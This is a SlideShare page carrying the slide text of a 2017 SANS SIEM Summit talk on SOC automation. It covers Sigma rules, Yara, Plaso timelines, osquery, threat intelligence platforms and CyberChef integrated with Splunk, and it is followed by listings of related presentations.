SlideShare a Scribd company logo

10(?) holiday gifts for the SOC who has everything

Download as PPTX, PDF
R
Ryan Kovar

Automating your organization’s security operations is no longer optional. It’s essential. Increasing analyst productivity and decreasing response time can mean the difference between successfully containing an attack, and suffering a devastating breach. This talk will focus on ten practical automation techniques—each implemented in either Python or PowerShell— that extend the functionality of a popular commercial SIEM. Each technique will demonstrate how to automatically gather additional context on an alert, make configuration changes in an operational environment, or retrieve and analyze forensic evidence. Proof of concept code samples and live/recorded demonstrations will be provided.

Technology
1 of 80
Ten(?) Holiday Gift Ideas for the SOC Who Has Everything Dave Ryan @ SANS SIEM & Tactical Analytics Summit November 2017
Disclaimer 2 During the course of this presentation, we may make forward looking statements regarding future events or the expected performance of the company. I often lie. Maybe this is a lie. Wik Alsø wik Alsø alsø wik Wi nøt trei a høliday in Sweden this yër? See the løveli lakes The wøndërful telephøne system And mäni interesting furry animals The characters and incidents portrayed and the names used in this Presentation are fictitious and any similarity to the names, characters, or history of any person is entirely accidental and unintentional. Signed RICHARD M. NIXON Including the majestik møøse A Møøse once bit my Marcus... No realli! He was Karving his initials on the møøse with the sharpened end of an interspace tøøthbrush given him by Svenge – his brother-in-law – a Canadian dentist and star of many Norwegian møvies: "The Høt Hands of an Canadian Dentist", "Fillings of Passion", "The Huge Mølars of Horst Nordfink"... In addition, any information about our roadmap outlines our general product direction and is subject to change at any time without notice. Splunk undertakës no øbligation either to develøp the features or functionality described or to include any such feature or functionality in a future release.
• 17 years of cyber security experience • Current role on Security Practice team focuses on incident/breach response, threat intelligence, and research • Also investigating why printers are so insubordinate ಠ_ಠ 3 Staff Security Strategist Minster of the OODAloopers @meansec # whoami > Ryan Kovar CISSP,MSc(Dist)
- 20+ years IT and security - Information security officer, security architect, pen tester, consultant, SE, system/network engineer - Former SANS Mentor - Co-creator of Splunk Boss of the SOC Security Architect @splunk @daveherrald # whoami > Dave Herrald CISSP, GIAC G*, GSE #79
We use Splunk But you don’t have to!
On the shoulders of giants
Florian Roth • Twitter: @cyb3rop • Github: https://github.com/Neo23x0 • Currently employed at: https://www.bsk-consulting.de • Sigma author • Yara signature creator extraordinaire
Expectations…
Test your SIEM with Realistic Data
BOTS Data Is Free • Splunk Boss of the SOC is a realistic, blue-team CTF • BOTS Version 1 debuted in September 2016 • Data set has been open-sourced. (CCO license) • Available as pre-indexed Splunk data, JSON, and CSV https://github.com/daveherrald/botsv 1
BOTS Data Is Realistic • Realistic attack data • Realistic background noise • Includes 22 data types • Windows events • Microsoft Sysmon • Windows registry • Wire data (HTTP, DNS, DHCP, etc.) • Suricata • Firewall
Open source detection rules
SIGMA Generic Signature Format for SIEM • Developed by Florian Roth and Thomas Patzke • https://github.com/Neo23x0/sigma What’s in the box? • Rule specification • Open repository of signatures • A Python converter for different SIEM systems
SIGMA – Preparing to test against BOTSv1 data • Focus on Sysmon data for this test - About 46 of 148 Sigma rules at time of test • Need to convert Sigma Sysmon rules to Splunk searches • I used sigmac.py manually, included with Sigma • Recommend the excellent TA-Sigma- Searches add-on for Splunk - https://github.com/dstaulcu/TA-Sigma- Searches - Finished product - Also includes the PowerShell wrapper for sigmac.py that takes care of a lot of messy details
SIGMA – Test against BOTSv1 data set Success! • sysmon_office_macro_cmd.yml • sysmon_office_shell.yml • sysmon_susp_execution_path_webserver.yml • sysmon_susp_net_execution.yml • sysmon_webshell_spawn.yml Follow-up • More hits with other Sigma rules? • Contribute new rules to Sigma
Automating your first 15 minutes
The Practice of Network Security Monitoring, Richard Betjli
Then one day you have an “incident”
Automate Local Yara Scan
Yara on the local host
Now run Yara on the local host
Yara on the local host *thanks Florian!
Yara in da SIEM
Yara in da SIEM
Integration into the DFIR world
Supertimeline in Excel Template
Supertimeline in a SIEM
Supertimeline in a SIEMStore and search over multiple timelines
Supertimeline in a SIEMStore and search over multiple timelines Extract the Supertimeline Source Types
Supertimeline in a SIEMStore and search over multiple timelines Extract the Supertimeline Source Types Specify time ranges
Supertimeline in a SIEMStore and search over multiple timelines Extract the Supertimeline Source Types Specify time ranges Ad-hoc search
Supertimeline in a SIEMStore and search over multiple timelines Extract the Supertimeline Source Types Specify time ranges Ad-hoc search Familiar color coding
Resources Supertimeline(Plaso) Splunk Apps • https://github.com/daveherrald/TA_plaso-add-on-for-splunk • https://github.com/daveherrald/SA_plaso-app-for-splunk Earlier work from Nick Klein • https://www.youtube.com/watch?v=xe0qJriD7aM
Labeling your gifts rules
Too many damn rules!
SIEM rule creep
Make a SIEM rule taxonomy!
Don’t reinvent the wheel
• “4” Indicates it is in the 4th stage of the kill chain • “002” Indicates it is the 2nd rule written in ”4” category • “EXP” Indicates it is in the ’Exploit’ category • Lastly, the name of the rule Don’t reinvent the wheel https://conf.splunk.com/files/2016/slides/maturing-workdays-soc-with-splunk.pdf
Don’t reinvent the wheel https://conf.splunk.com/files/2016/slides/maturing-workdays-soc-with-splunk.pdf
Endpoint Data On-Demand
Current osquery Capability with Splunk •Schedule osquery queries •Log results locally •Monitor with Universal Forwarder •Analyze with Splunk •We include this in BOTS v2 if you want to see it in action •https://splunkbase.splunk.com/app/3278 /
What’s new?
Osquery clients directly connected to Splunk
Osquery clients directly connected to Splunk Multiple endpoints.
Osquery clients directly connected to Splunk Multiple endpoints. Active connections.
Osquery clients directly connected to Splunk Multiple endpoints. Active connections. Windows, Linux, OSX
So what?
Your analysts can now query an endpoint, on-demand… Choose from saved queries, like Listening Ports
Any connected endpoint Run the query on the endpoints you choose.
With results available in seconds…
From all the queried clients…
Query results are stored for future analysis
Details •No Splunk software on the endpoint, osquery only •TLS transport •Collects both on-demand and scheduled query results •GOTO: Disclaimer
TIP’ing your SIEM
OK… So what’s a TIP again? YETIAn open source malware and threat repository that leverages other open source software to create a unified tool for analysts and security experts engaged in threat defense. Malware Information Sharing Platform (MISP) allows organizations to share information about malware and their indicators. MISP users benefit from the collaborative knowledge about existing malware or threats. Yeti is a platform meant to organize observables, indicators of compromise, TTPs, and knowledge on threats in a single, unified repository “Threat Intelligence Platform”
A SIEM acting as a TIP
A SIEM acting as a TIP
The Practice of Network Security Monitoring, Richard Betjli
Optimizing your SIEM Analysis with CyberChef
Optimizing Analysis with CyberChef • Developed and maintained by GCHQ • Open source, Apache 2.0 License and Crown Copyright • https://github.com/gchq/CyberChef • Convert virtually any data format to any other • Web based • Processing is performed locally using JavaScript in the browser • Easy to use, powerful, programmable, extensible
CyberChef Integrated with Your SIEM
CyberChef Recipes (encodings aplenty)
CyberChef Recipes (encodings aplenty)
CyberChef Recipes (encodings aplenty and more)
CyberChef Recipes (Holiday Playlist) Encodings • Base64 • Hexdump • URL/HTML Entity Encryption • AES • 3DES • RC4 • XOR Public Key Crypto • Parse X509 • PEM to DER Logical • AND/OR/NOT/X OR • Bit shift • Endian flip Networking • Parse UA string • Parse URI • NETBIOS Encoding Languages • Dozens • Unicode un- escaping Text Manipulation • Upper, lower • Sort, count, uniq • Head, tail • Regex Extractions • IP • File names • Domains • EXIF Compression • Zip, gzip, bz2 • Tar Hashing • SHA1/SHA2/Md5 • HMAC • CRC
CyberChef Resources About: https://www.gchq.gov.uk/news-article/cyberchef-cyber-swiss-army- knife Code: https://github.com/gchq/CyberChef Demo: https://gchq.github.io/CyberChef/ Splunk SIEM Integration: https://github.com/daveherrald/TA-cyberchef
Takeaways • Get some “SIEMsipration”! • Think outside of “Alerts and Events • Use third-party open source tools t “accelerate” your bicycle • Automate the mundane. Investigat the interesting.
Dave Herrald dherrald@splunk.com @daveherrald Ryan Kovar rkovar@splunk.com @meansec http://blogs.splunk.com/author/rkovar Contact info

Recommended

SOCs for the rest of us
SOCs for the rest of usSOCs for the rest of us
SOCs for the rest of us
Ryan Kovar
 
Hidden empires of malware
Hidden empires of malwareHidden empires of malware
Hidden empires of malware
Ryan Kovar
 
The Hidden Empires of Malware with TLS Certified Hypotheses and Machine Learning
The Hidden Empires of Malware with TLS Certified Hypotheses and Machine LearningThe Hidden Empires of Malware with TLS Certified Hypotheses and Machine Learning
The Hidden Empires of Malware with TLS Certified Hypotheses and Machine Learning
Ryan Kovar
 
Threat Intelligence Victory Garden
Threat Intelligence Victory GardenThreat Intelligence Victory Garden
Threat Intelligence Victory Garden
Ryan Kovar
 
Wireless crime and forensic investigation g. kipper (auerbach, 2007) ww
Wireless crime and forensic investigation g. kipper (auerbach, 2007) wwWireless crime and forensic investigation g. kipper (auerbach, 2007) ww
Wireless crime and forensic investigation g. kipper (auerbach, 2007) ww
yesumanitvr
 
Attack Simulation and Hunting
Attack Simulation and HuntingAttack Simulation and Hunting
Attack Simulation and Hunting
nathi mogomotsi
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
Splunk
 
Genetic Malware
Genetic MalwareGenetic Malware
Genetic Malware
Lauren Sheppard
 

Recommended

SOCs for the rest of us
SOCs for the rest of usSOCs for the rest of us
SOCs for the rest of us
Ryan Kovar
 
Hidden empires of malware
Hidden empires of malwareHidden empires of malware
Hidden empires of malware
Ryan Kovar
 
The Hidden Empires of Malware with TLS Certified Hypotheses and Machine Learning
The Hidden Empires of Malware with TLS Certified Hypotheses and Machine LearningThe Hidden Empires of Malware with TLS Certified Hypotheses and Machine Learning
The Hidden Empires of Malware with TLS Certified Hypotheses and Machine Learning
Ryan Kovar
 
Threat Intelligence Victory Garden
Threat Intelligence Victory GardenThreat Intelligence Victory Garden
Threat Intelligence Victory Garden
Ryan Kovar
 
Wireless crime and forensic investigation g. kipper (auerbach, 2007) ww
Wireless crime and forensic investigation g. kipper (auerbach, 2007) wwWireless crime and forensic investigation g. kipper (auerbach, 2007) ww
Wireless crime and forensic investigation g. kipper (auerbach, 2007) ww
yesumanitvr
 
Attack Simulation and Hunting
Attack Simulation and HuntingAttack Simulation and Hunting
Attack Simulation and Hunting
nathi mogomotsi
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
Splunk
 
Genetic Malware
Genetic MalwareGenetic Malware
Genetic Malware
Lauren Sheppard
 
2018 - Using Honeypots for Network Security Monitoring
2018 - Using Honeypots for Network Security Monitoring2018 - Using Honeypots for Network Security Monitoring
2018 - Using Honeypots for Network Security Monitoring
chrissanders88
 
Using Canary Honeypots for Network Security Monitoring
Using Canary Honeypots for Network Security MonitoringUsing Canary Honeypots for Network Security Monitoring
Using Canary Honeypots for Network Security Monitoring
chrissanders88
 
Finding Bugs FASTER with Fuzzing
Finding Bugs FASTER with FuzzingFinding Bugs FASTER with Fuzzing
Finding Bugs FASTER with Fuzzing
Alper Başaran
 
SPS Chicago - Practical Information Architecture
SPS Chicago - Practical Information ArchitectureSPS Chicago - Practical Information Architecture
SPS Chicago - Practical Information Architecture
Ruven Gotz
 
Implementing Inexpensive Honeytrap Techniques
Implementing Inexpensive Honeytrap TechniquesImplementing Inexpensive Honeytrap Techniques
Implementing Inexpensive Honeytrap Techniques
Daniel Miessler
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CanSecWest
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To Noise
Andrew Morris
 
Shamoon
ShamoonShamoon
Shamoon
Shakacon
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoDefcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using Crypto
John Bambenek
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
EC-Council
 
SPS Twin Cities - Practical SharePoint Information Architecture
SPS Twin Cities - Practical SharePoint Information ArchitectureSPS Twin Cities - Practical SharePoint Information Architecture
SPS Twin Cities - Practical SharePoint Information Architecture
Ruven Gotz
 
Networking 2016-05-24 - Topic 2 - The "Hack Back" - How Hacking Team Became t...
Networking 2016-05-24 - Topic 2 - The "Hack Back" - How Hacking Team Became t...Networking 2016-05-24 - Topic 2 - The "Hack Back" - How Hacking Team Became t...
Networking 2016-05-24 - Topic 2 - The "Hack Back" - How Hacking Team Became t...
North Texas Chapter of the ISSA
 
Needlesand haystacks i360-dublin
Needlesand haystacks i360-dublinNeedlesand haystacks i360-dublin
Needlesand haystacks i360-dublin
Derek King
 
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
North Texas Chapter of the ISSA
 
Cybereason - behind the HackingTeam infection server
Cybereason - behind the HackingTeam infection serverCybereason - behind the HackingTeam infection server
Cybereason - behind the HackingTeam infection server
Amit Serper
 
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Andrew Morris
 
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
Andrew Morris
 
Applied Detection and Analysis Using Flow Data - MIRCon 2014
Applied Detection and Analysis Using Flow Data - MIRCon 2014Applied Detection and Analysis Using Flow Data - MIRCon 2014
Applied Detection and Analysis Using Flow Data - MIRCon 2014
chrissanders88
 
ANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at Scale
John Bambenek
 
A Vision for Shared, Central Intelligence to Ebb a Growing Flood of Alerts
A Vision for Shared, Central Intelligence to Ebb a Growing Flood of AlertsA Vision for Shared, Central Intelligence to Ebb a Growing Flood of Alerts
A Vision for Shared, Central Intelligence to Ebb a Growing Flood of Alerts
Priyanka Aash
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
Splunk
 
CYBERSECURITY: Game Planning for Success lunch and learn event, April 10th
CYBERSECURITY: Game Planning for Success lunch and learn event, April 10thCYBERSECURITY: Game Planning for Success lunch and learn event, April 10th
CYBERSECURITY: Game Planning for Success lunch and learn event, April 10th
United Technology Group (UTG)
 

More Related Content

What's hot

2018 - Using Honeypots for Network Security Monitoring
2018 - Using Honeypots for Network Security Monitoring2018 - Using Honeypots for Network Security Monitoring
2018 - Using Honeypots for Network Security Monitoring
chrissanders88
 
SPS Chicago - Practical Information Architecture
SPS Chicago - Practical Information ArchitectureSPS Chicago - Practical Information Architecture
SPS Chicago - Practical Information Architecture
Ruven Gotz
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CanSecWest
 
Networking 2016-05-24 - Topic 2 - The "Hack Back" - How Hacking Team Became t...
Networking 2016-05-24 - Topic 2 - The "Hack Back" - How Hacking Team Became t...Networking 2016-05-24 - Topic 2 - The "Hack Back" - How Hacking Team Became t...
Networking 2016-05-24 - Topic 2 - The "Hack Back" - How Hacking Team Became t...
North Texas Chapter of the ISSA
 
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
North Texas Chapter of the ISSA
 
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Andrew Morris
 
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
Andrew Morris
 

What's hot (19)

2018 - Using Honeypots for Network Security Monitoring
2018 - Using Honeypots for Network Security Monitoring2018 - Using Honeypots for Network Security Monitoring
2018 - Using Honeypots for Network Security Monitoring
 
Using Canary Honeypots for Network Security Monitoring
Using Canary Honeypots for Network Security MonitoringUsing Canary Honeypots for Network Security Monitoring
Using Canary Honeypots for Network Security Monitoring
 
Finding Bugs FASTER with Fuzzing
Finding Bugs FASTER with FuzzingFinding Bugs FASTER with Fuzzing
Finding Bugs FASTER with Fuzzing
 
SPS Chicago - Practical Information Architecture
SPS Chicago - Practical Information ArchitectureSPS Chicago - Practical Information Architecture
SPS Chicago - Practical Information Architecture
 
Implementing Inexpensive Honeytrap Techniques
Implementing Inexpensive Honeytrap TechniquesImplementing Inexpensive Honeytrap Techniques
Implementing Inexpensive Honeytrap Techniques
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To Noise
 
Shamoon
ShamoonShamoon
Shamoon
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoDefcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using Crypto
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
 
SPS Twin Cities - Practical SharePoint Information Architecture
SPS Twin Cities - Practical SharePoint Information ArchitectureSPS Twin Cities - Practical SharePoint Information Architecture
SPS Twin Cities - Practical SharePoint Information Architecture
 
Networking 2016-05-24 - Topic 2 - The "Hack Back" - How Hacking Team Became t...
Networking 2016-05-24 - Topic 2 - The "Hack Back" - How Hacking Team Became t...Networking 2016-05-24 - Topic 2 - The "Hack Back" - How Hacking Team Became t...
Networking 2016-05-24 - Topic 2 - The "Hack Back" - How Hacking Team Became t...
 
Needlesand haystacks i360-dublin
Needlesand haystacks i360-dublinNeedlesand haystacks i360-dublin
Needlesand haystacks i360-dublin
 
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
 
Cybereason - behind the HackingTeam infection server
Cybereason - behind the HackingTeam infection serverCybereason - behind the HackingTeam infection server
Cybereason - behind the HackingTeam infection server
 
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
 
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
 
Applied Detection and Analysis Using Flow Data - MIRCon 2014
Applied Detection and Analysis Using Flow Data - MIRCon 2014Applied Detection and Analysis Using Flow Data - MIRCon 2014
Applied Detection and Analysis Using Flow Data - MIRCon 2014
 
ANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at Scale
 

Similar to 10(?) holiday gifts for the SOC who has everything

Data-Driven Threat Intelligence: Metrics on Indicator Dissemination and Sharing
Data-Driven Threat Intelligence: Metrics on Indicator Dissemination and SharingData-Driven Threat Intelligence: Metrics on Indicator Dissemination and Sharing
Data-Driven Threat Intelligence: Metrics on Indicator Dissemination and Sharing
Alex Pinto
 
The Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CDThe Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CD
James Wickett
 
MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...
MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...
MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...
MITRE - ATT&CKcon
 
Distributed Sensor Data Contextualization for Threat Intelligence Analysis
Distributed Sensor Data Contextualization for Threat Intelligence AnalysisDistributed Sensor Data Contextualization for Threat Intelligence Analysis
Distributed Sensor Data Contextualization for Threat Intelligence Analysis
Jason Trost
 

Similar to 10(?) holiday gifts for the SOC who has everything (20)

A Vision for Shared, Central Intelligence to Ebb a Growing Flood of Alerts
A Vision for Shared, Central Intelligence to Ebb a Growing Flood of AlertsA Vision for Shared, Central Intelligence to Ebb a Growing Flood of Alerts
A Vision for Shared, Central Intelligence to Ebb a Growing Flood of Alerts
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
 
CYBERSECURITY: Game Planning for Success lunch and learn event, April 10th
CYBERSECURITY: Game Planning for Success lunch and learn event, April 10thCYBERSECURITY: Game Planning for Success lunch and learn event, April 10th
CYBERSECURITY: Game Planning for Success lunch and learn event, April 10th
 
(in)Secure Secret Zone
(in)Secure Secret Zone(in)Secure Secret Zone
(in)Secure Secret Zone
 
Malware Analysis
Malware AnalysisMalware Analysis
Malware Analysis
 
Discover advanced threats with threat intelligence - Jeremy Li
Discover advanced threats with threat intelligence - Jeremy LiDiscover advanced threats with threat intelligence - Jeremy Li
Discover advanced threats with threat intelligence - Jeremy Li
 
Ending the Tyranny of Expensive Security Tools: A New Hope
Ending the Tyranny of Expensive Security Tools: A New HopeEnding the Tyranny of Expensive Security Tools: A New Hope
Ending the Tyranny of Expensive Security Tools: A New Hope
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
 
Threat Hunting with Splunk
Threat Hunting with Splunk Threat Hunting with Splunk
Threat Hunting with Splunk
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
 
Splunk workshop-Threat Hunting
Splunk workshop-Threat HuntingSplunk workshop-Threat Hunting
Splunk workshop-Threat Hunting
 
Fun with Application Security
Fun with Application SecurityFun with Application Security
Fun with Application Security
 
Data-Driven Threat Intelligence: Metrics on Indicator Dissemination and Sharing
Data-Driven Threat Intelligence: Metrics on Indicator Dissemination and SharingData-Driven Threat Intelligence: Metrics on Indicator Dissemination and Sharing
Data-Driven Threat Intelligence: Metrics on Indicator Dissemination and Sharing
 
The Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CDThe Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CD
 
MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...
MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...
MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...
 
Distributed Sensor Data Contextualization for Threat Intelligence Analysis
Distributed Sensor Data Contextualization for Threat Intelligence AnalysisDistributed Sensor Data Contextualization for Threat Intelligence Analysis
Distributed Sensor Data Contextualization for Threat Intelligence Analysis
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
 
Getting Started with Splunk Breakout Session
Getting Started with Splunk Breakout SessionGetting Started with Splunk Breakout Session
Getting Started with Splunk Breakout Session
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
 
Open Secrets of the Defense Industry: Building Your Own Intelligence Program ...
Open Secrets of the Defense Industry: Building Your Own Intelligence Program ...Open Secrets of the Defense Industry: Building Your Own Intelligence Program ...
Open Secrets of the Defense Industry: Building Your Own Intelligence Program ...
 

Recently uploaded

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Principled Technologies
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 

Recently uploaded (20)

AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Why Teams call analytics are critical to your entire business
